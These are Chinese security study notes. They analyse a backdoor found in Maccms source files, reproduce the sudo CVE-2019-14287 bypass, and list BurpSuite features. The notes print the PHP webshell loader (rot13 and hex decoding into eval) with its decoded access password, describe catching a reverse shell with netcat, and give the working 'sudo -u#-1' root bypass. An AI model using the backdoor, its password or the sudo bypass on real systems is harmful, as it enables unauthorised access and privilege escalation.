10.16Maccms后门分析、Sudo提权漏洞(CVE-2019-14287)复现
Maccms后门分析
maccms网站基于php+mysql的系统,易用性、功能良好等优点,用途范围广
打开源码,extend\Qcloud\Sms\Sms.php、extend\upyun\src\Upyun\Api\Format.php是两个后门(Sms.php和Format.php是后门木马 二者代码相同)
<?php
error_reporting(E_ERROR);//报错
@ini_set('display_errors','Off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256M'); //所有ini_set都是初始化环境
header("content-Type: text/html; charset=utf-8");
$password = "0d41c75e2ab34a3740834cdd7e066d90";//MD5加密的密码,解密后为WorldFilledWithLove
functions(){
$str =”编码后的恶意代码”;
$str = str_rot13($str);
m($str);
}
function m($str){
global $password;
$jj = '';
eval($jj.pack('H*',$str).$jj); //pack('H*',$str)对混淆的php进行解码,解码之后进行eval函数处理
}
s();
?>
使用密码访问http://127.0.0.1/extend/Qcloud/Sms/Sms.php(访问Sms.php或Format.php,地址根据自己情况来)
这样就能看到管理的文件信息
反弹shell(将目标机上的终端或者解析器或shell弹到攻击者指定的电脑中,需要攻击者提前监听端口:使用“nc -lvvp 端口号” l表示本地 vv表示详细信息 p表示端口)
这样就能反弹目标机的shell到指定的地址上
Sudo提权漏洞(CVE-2019-14287)复现
Sudo是linux系统命令,用来让普通账号以root身份去执行某些命令,如,安装软件、查看某些配置文件、关机、重启等操作
,如果普通账号需要使用sudo,需要修改配置文件/etc.sudoers,将sudo使用权赋予该账号。
Sudo提权漏洞是一个安全策略绕过问题去执行某些敏感的命令,CVE编号是CVE-2019-14287,影响的版本是小于1.8.28的版本
复现:
Step1:查看版本 sudo -V
Step2:修改配置文件:vim /etc/sudoers在root ALL=(ALL:ALL)ALL下面添加一行配置代码
test ALL=(ALL,!root)ALL
第一个all表示该用户可以在任意地方使用sudo
(ALL,!root)表示明了可以被除了root以外的用户执行
最后的All表示被允许执行
整体:test用户可以使用sudo,但是除了root以外的任意用户去执行命令
注意:需要创建test用户: useradd test , passwd test
Step3:切换到test用户,su test ,然后sudo id(查看root的id),发现没有权限去执行(这是root的权限)
使用如下方法执行我们想执行的命令
sudo -u#数字 命令
数字范围:-1~4294967295,命令是系统命令
其中数字-1表示root身份
修复方法:更新sudo版本1.8.28之后
总结:该漏洞复现比较鸡肋,需要管理员修改配置文件
BurpSuite功能
proxy代理
target目标
spider爬虫
scanner漏洞扫描
intruder暴力破解
repeater重放/中继(修改数据包并发送出去,查看回来的数据效果)
sequencer 定序器(分析不可预知的应用程序会话令牌和重要数据项的随机性的工具)
decoder编解码
comparer 比较
extender扩展(python、java、php)
其他
Project项目
User用户